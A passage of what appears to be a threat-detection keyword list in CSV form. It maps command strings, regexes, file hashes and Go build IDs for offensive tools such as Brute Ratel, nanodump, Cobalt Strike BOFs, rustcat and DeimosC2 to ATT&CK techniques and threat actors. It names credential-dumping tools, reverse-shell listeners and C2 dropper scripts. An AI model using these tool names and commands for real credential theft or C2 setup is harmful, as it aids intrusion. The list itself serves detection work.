"memhunt *","memhunt\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63580"
"nanodump*","nanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","63581"
"needle_sift *","needle_sift\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","0","N/A","N/A","10","10","32","8","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z","63582"
"net.recon *","net\.recon\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","63583"
"nikto -*","nikto\s\-.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","0","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","63584"
"noclient-3.*","noclient\-3\..{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","#linux","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","63585"
"onex install *","onex\sinstall\s.{0,1000}","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1105 - T1078 - T1059 - T1087","TA0007 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/rajkumardusad/onex","1","0","N/A","N/A","N/A","","N/A","","","","63586"
"pandasec888/taowu-cobalt_strike","pandasec888\/taowu\-cobalt_strike","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","63587"
"rcat listen *","rcat\slisten\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","63588"
"set shellcode *","set\sshellcode\s.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","63589"
"sharescan *.txt",".{0,1000}\\sharescan\s.{0,1000}\.txt","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63591"
"SigFlip *.exe*","SigFlip\s.{0,20}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","63592"
"sudomy -*","sudomy\s\-.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","#linux","N/A","N/A","10","2139","396","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z","63594"
"","C\:\\Windows\\Temp\\[a-zA-Z0-9]{8}.tmp","offensive_tool_keyword","Netexec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#regexonly","https://bsky.app/profile/securityaura.bsky.social/post/3lg7uqko4kk2l","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","63595"
"*da3465b18efdf0a562bd5e9a4b32e125748bf28e42ec7df7afc91cfa59942371*",".{0,1000}da3465b18efdf0a562bd5e9a4b32e125748bf28e42ec7df7afc91cfa59942371.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63596"
"*a3c6eeb29b62cb5700f821078ecf0f8feab0a13dc57f48c86fbf9be0f87e5808*",".{0,1000}a3c6eeb29b62cb5700f821078ecf0f8feab0a13dc57f48c86fbf9be0f87e5808.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63597"
"*725770a6eb8569acccbd5120d56b8daf858c450b82badde78a34b653b255ec54*",".{0,1000}725770a6eb8569acccbd5120d56b8daf858c450b82badde78a34b653b255ec54.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63598"
"*01408bfa53f638c29a7e61818203a36a8e47f4f91cb7be1f86b47501ac652782*",".{0,1000}01408bfa53f638c29a7e61818203a36a8e47f4f91cb7be1f86b47501ac652782.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63599"
"*aeb63c7b5035d4dc7955535e58abf3132aedd4797046c78d85e0efef68543b2e*",".{0,1000}aeb63c7b5035d4dc7955535e58abf3132aedd4797046c78d85e0efef68543b2e.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63600"
"*482877b51cb1e6dae1fa15041c66be281024fcef535fe082f4a235e375484af5*",".{0,1000}482877b51cb1e6dae1fa15041c66be281024fcef535fe082f4a235e375484af5.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63601"
"*7dc51ce8272f0e338dfb894cee39680ad993daa6e85cdf7a2dbabe5af1593bb0*",".{0,1000}7dc51ce8272f0e338dfb894cee39680ad993daa6e85cdf7a2dbabe5af1593bb0.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63602"
"*a53985665f19360d259a819f2f85a83dc1deacd0f6fe09528743dcaab8ce32d7*",".{0,1000}a53985665f19360d259a819f2f85a83dc1deacd0f6fe09528743dcaab8ce32d7.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63603"
"*98be289d235122f8d2bc72246cc2ff49e6fc5cb37407ec8778318b4c5199f542*",".{0,1000}98be289d235122f8d2bc72246cc2ff49e6fc5cb37407ec8778318b4c5199f542.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63604"
"*1cb81420f111140340996ad65207ee94f5178d1171a4190c52f211c7f170a7b7*",".{0,1000}1cb81420f111140340996ad65207ee94f5178d1171a4190c52f211c7f170a7b7.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63605"
"*67YvxuEhCsTJqmwqxV7p/8eENwYLGCYuYoBCvdKyG/9zLP5u0a5h3txOj_qPl9/fW-LxZp9h6q9V3aA6ffd*",".{0,1000}67YvxuEhCsTJqmwqxV7p\/8eENwYLGCYuYoBCvdKyG\/9zLP5u0a5h3txOj_qPl9\/fW\-LxZp9h6q9V3aA6ffd.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63606"
"*9F7tor7mhCiJDysQw_L-/INohvCnRtBSSigrVsCTG/T8Fob1oGNlum0Cxw0arO/trAJsF-_gCbhRcNvV28V*",".{0,1000}9F7tor7mhCiJDysQw_L\-\/INohvCnRtBSSigrVsCTG\/T8Fob1oGNlum0Cxw0arO\/trAJsF\-_gCbhRcNvV28V.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63607"
"*9dKrWvAAfLukROzUNYjZ/e9RttunI_EAOjwyngPQP/u91LKeDlvTxx65l9eSDQ/-DdyfNC8_OZHVdpZ-LAq*",".{0,1000}9dKrWvAAfLukROzUNYjZ\/e9RttunI_EAOjwyngPQP\/u91LKeDlvTxx65l9eSDQ\/\-DdyfNC8_OZHVdpZ\-LAq.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63608"
"*9nRCCXM3KQqphMrdO4A2/DIVi7cW5eTrd1BUlOSlY/BMUbCQ3rs0p9w5Et2c1c/9cUnk20rr8LfGcwcmOn2*",".{0,1000}9nRCCXM3KQqphMrdO4A2\/DIVi7cW5eTrd1BUlOSlY\/BMUbCQ3rs0p9w5Et2c1c\/9cUnk20rr8LfGcwcmOn2.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63609"
"*MqmtPXHsIlsw5EWlh_iz/d0MIamyPxY_i5HgyF7A6/SjL--RuTH6yxpvqvQpg0/e76G1GENbxSdd_Ybi8U_*",".{0,1000}MqmtPXHsIlsw5EWlh_iz\/d0MIamyPxY_i5HgyF7A6\/SjL\-\-RuTH6yxpvqvQpg0\/e76G1GENbxSdd_Ybi8U_.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63610"
"*T9s0FutG88kZ8BPo9iWA/zah4Ern4bK4lsKZ0pE46/AF1V207LA9Vqs9anuQmf/43O9OIaipkIcVdfnlpkM*",".{0,1000}T9s0FutG88kZ8BPo9iWA\/zah4Ern4bK4lsKZ0pE46\/AF1V207LA9Vqs9anuQmf\/43O9OIaipkIcVdfnlpkM.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63611"
"*ftX7dRXD7AzD3o29ogT6/jwn3GDixxrpnrFlY05In/9uvIfvPhpf36fnK3eGJ1/2oRlb6HJjyMWmEoZSP9H*",".{0,1000}ftX7dRXD7AzD3o29ogT6\/jwn3GDixxrpnrFlY05In\/9uvIfvPhpf36fnK3eGJ1\/2oRlb6HJjyMWmEoZSP9H.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63612"
"*kz9PeumUFPfu15BW5JHP/Vzq-0GhJYD5QsW9eGent/spfAVyHh45zEcYzik0Ys/V7tbqg80MDK92O5TWI1d*",".{0,1000}kz9PeumUFPfu15BW5JHP\/Vzq\-0GhJYD5QsW9eGent\/spfAVyHh45zEcYzik0Ys\/V7tbqg80MDK92O5TWI1d.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63613"
"*nfBUs4GIb-lk5T1y3ce0/AeFb8T7rxCJqj5fxLLqU/M98mH-F6Ol7mDiQDgpTX/7Ci4jIkONBi58pXHBBW2*",".{0,1000}nfBUs4GIb\-lk5T1y3ce0\/AeFb8T7rxCJqj5fxLLqU\/M98mH\-F6Ol7mDiQDgpTX\/7Ci4jIkONBi58pXHBBW2.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63614"
"*t-YM5mES5i58beFX3Fvw/lIYieezobFTWoUqwZHs7/S0XOterfAiNITgOjhFYV/ynBlbRscD__FetsICudx*",".{0,1000}t\-YM5mES5i58beFX3Fvw\/lIYieezobFTWoUqwZHs7\/S0XOterfAiNITgOjhFYV\/ynBlbRscD__FetsICudx.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63615"
"*uHXH4r3MVrfP_FEK1O1B/7KutUqnsT1lPUK4qq_ux/HcE545qbkn4rx27pKrdJ/h_-zlV8Ba5MWvRKA2EGM*",".{0,1000}uHXH4r3MVrfP_FEK1O1B\/7KutUqnsT1lPUK4qq_ux\/HcE545qbkn4rx27pKrdJ\/h_\-zlV8Ba5MWvRKA2EGM.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63616"
"* install pypykatz*",".{0,1000}\sinstall\spypykatz.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63617"
"* lsassparse.py*",".{0,1000}\slsassparse\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63618"
"* ondisk_dropper_tcp.ps1*",".{0,1000}\sondisk_dropper_tcp\.ps1.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63619"
"* ondisk_dropper_tcp.py*",".{0,1000}\sondisk_dropper_tcp\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63620"
"* ondisk_dropper_tcp.sh*",".{0,1000}\sondisk_dropper_tcp\.sh.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#linux","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63621"
"*/agents/bin/minidump.exe*",".{0,1000}\/agents\/bin\/minidump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63622"
"*/bin/ntdsdump.elf*",".{0,1000}\/bin\/ntdsdump\.elf.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63623"
"*/bin/samdump.elf*",".{0,1000}\/bin\/samdump\.elf.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63624"
"*/c2VuePlugin.js*",".{0,1000}\/c2VuePlugin\.js.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63625"
"*/DeimosC2-Migration/*",".{0,1000}\/DeimosC2\-Migration\/.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#content","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63626"
"*/DeimosC2.git*",".{0,1000}\/DeimosC2\.git.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63627"
"*/DeimosC2/releases/download/*",".{0,1000}\/DeimosC2\/releases\/download\/.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63628"
"*/DeimosC2/releases/tag/*",".{0,1000}\/DeimosC2\/releases\/tag\/.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63629"
